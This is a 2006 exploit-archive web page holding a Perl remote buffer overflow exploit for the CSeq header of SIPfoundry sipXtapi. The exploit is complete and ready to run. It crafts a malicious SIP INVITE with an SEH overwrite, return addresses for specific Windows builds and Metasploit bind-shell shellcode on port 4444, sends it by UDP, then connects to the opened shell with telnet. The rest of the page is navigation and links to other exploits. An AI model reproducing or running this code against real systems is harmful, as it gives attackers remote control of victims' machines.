首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SIPfoundry sipXtapi (CSeq) Remote Buffer Overflow Exploit
来源:vfocus.net 作者:acaro 发布时间:2006-07-25  

#!/usr/bin/perl
#
# Remote Buffer Overflow in sipXtapi
#
# bad char 0x00 0x09 0x0a 0x0d 0x20
#


use IO::Socket;
#use strict;

print "\n\n";
print "sipXtapi original Exploit by Michael Thumann added a real shellcode by acaro\n\n";
print "tested on sipXphone 2.6.0.27 read the code for ret address\n\n";

if (not $ARGV[0]) {
print "Usage: sipx.pl <host>\n";
exit;}

$target=$ARGV[0];
my $source ="127.0.0.1";
my $target_port = 5060;
my $user ="bad";
my $nextseh = "\xeb\x06\x90\x90";
my $seh="\xb0\x67\x01\x08"; # pop pop ret in jvm.dll for winxp Pro SP2 Italian universal ?
#my $seh="\x27\x13\x02\x08"; # call ebx in jvm.dll for win2k Pro SP0 Italian universal ?
#my $seh="\x22\x92\x06\x08"; # jmp ebx in jvm.dll for win2k Pro SP0 Italian universal ?
# if you use this ret you can exploits the target host many times
my $nop = "\x90"x32;


# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x25".
"\xe3\xa5\x9f\x83\xeb\xfc\xe2\xf4\xd9\x89\x4e\xd2\xcd\x1a\x5a\x60".
"\xda\x83\x2e\xf3\x01\xc7\x2e\xda\x19\x68\xd9\x9a\x5d\xe2\x4a\x14".
"\x6a\xfb\x2e\xc0\x05\xe2\x4e\xd6\xae\xd7\x2e\x9e\xcb\xd2\x65\x06".
"\x89\x67\x65\xeb\x22\x22\x6f\x92\x24\x21\x4e\x6b\x1e\xb7\x81\xb7".
"\x50\x06\x2e\xc0\x01\xe2\x4e\xf9\xae\xef\xee\x14\x7a\xff\xa4\x74".
"\x26\xcf\x2e\x16\x49\xc7\xb9\xfe\xe6\xd2\x7e\xfb\xae\xa0\x95\x14".
"\x65\xef\x2e\xef\x39\x4e\x2e\xdf\x2d\xbd\xcd\x11\x6b\xed\x49\xcf".
"\xda\x35\xc3\xcc\x43\x8b\x96\xad\x4d\x94\xd6\xad\x7a\xb7\x5a\x4f".
"\x4d\x28\x48\x63\x1e\xb3\x5a\x49\x7a\x6a\x40\xf9\xa4\x0e\xad\x9d".
"\x70\x89\xa7\x60\xf5\x8b\x7c\x96\xd0\x4e\xf2\x60\xf3\xb0\xf6\xcc".
"\x76\xb0\xe6\xcc\x66\xb0\x5a\x4f\x43\x8b\xb4\xc3\x43\xb0\x2c\x7e".
"\xb0\x8b\x01\x85\x55\x24\xf2\x60\xf3\x89\xb5\xce\x70\x1c\x75\xf7".
"\x81\x4e\x8b\x76\x72\x1c\x73\xcc\x70\x1c\x75\xf7\xc0\xaa\x23\xd6".
"\x72\x1c\x73\xcf\x71\xb7\xf0\x60\xf5\x70\xcd\x78\x5c\x25\xdc\xc8".
"\xda\x35\xf0\x60\xf5\x85\xcf\xfb\x43\x8b\xc6\xf2\xac\x06\xcf\xcf".
"\x7c\xca\x69\x16\xc2\x89\xe1\x16\xc7\xd2\x65\x6c\x8f\x1d\xe7\xb2".
"\xdb\xa1\x89\x0c\xa8\x99\x9d\x34\x8e\x48\xcd\xed\xdb\x50\xb3\x60".
"\x50\xa7\x5a\x49\x7e\xb4\xf7\xce\x74\xb2\xcf\x9e\x74\xb2\xf0\xce".
"\xda\x33\xcd\x32\xfc\xe6\x6b\xcc\xda\x35\xcf\x60\xda\xd4\x5a\x4f".
"\xae\xb4\x59\x1c\xe1\x87\x5a\x49\x77\x1c\x75\xf7\xd5\x69\xa1\xc0".
"\x76\x1c\x73\x60\xf5\xe3\xa5\x9f";
my $cseq =("\x41"x204).$nextseh.$seh.$nop.$shellcode;


my $packet =<<END;
INVITE sip:user\@$source SIP/2.0\r
To: <sip:$target:$target_port>\r
Via: SIP/2.0/UDP $target:3277\r
From: "moz"<sip:$target:3277>\r
Call-ID: 3121$target\r
CSeq: $cseq\r
Max-Forwards: 70\r
Contact: <sip:$source:5059>\r
\r
END

print "Sending Packet to: " . $target . "\n\n";
socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));
my $ipaddr = inet_aton($target);
my $sendto = sockaddr_in($target_port,$ipaddr);
send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to $target : $target_port : $!\n";
print "Done.\n";
$host = $ARGV[0];

print " + connect to $host on port 4444...\n";

system("telnet $host 4444");



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Cahier de texte 2.0 (Database
·X7 Chat <= 2.0.4 (old_prefi
·PHP-Nuke NukeAI Module 3b (uti
·Solaris <= 10 sysinfo() Loc
·fipsCMS <= 4.5 (index.asp)
·Etomite CMS <= 0.6.1 (usern
·XMPlay 3.3.0.4 (ASX Filename)
·Etomite CMS <= 0.6.1 (rfile
·ContentNow 1.39 (pageid) Remot
·libmikmod <= 3.2.2 (GT2 loa
·XMPlay <= 3.3.0.4 (PLS) Loc
·eIQnetworks License Manager Re
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved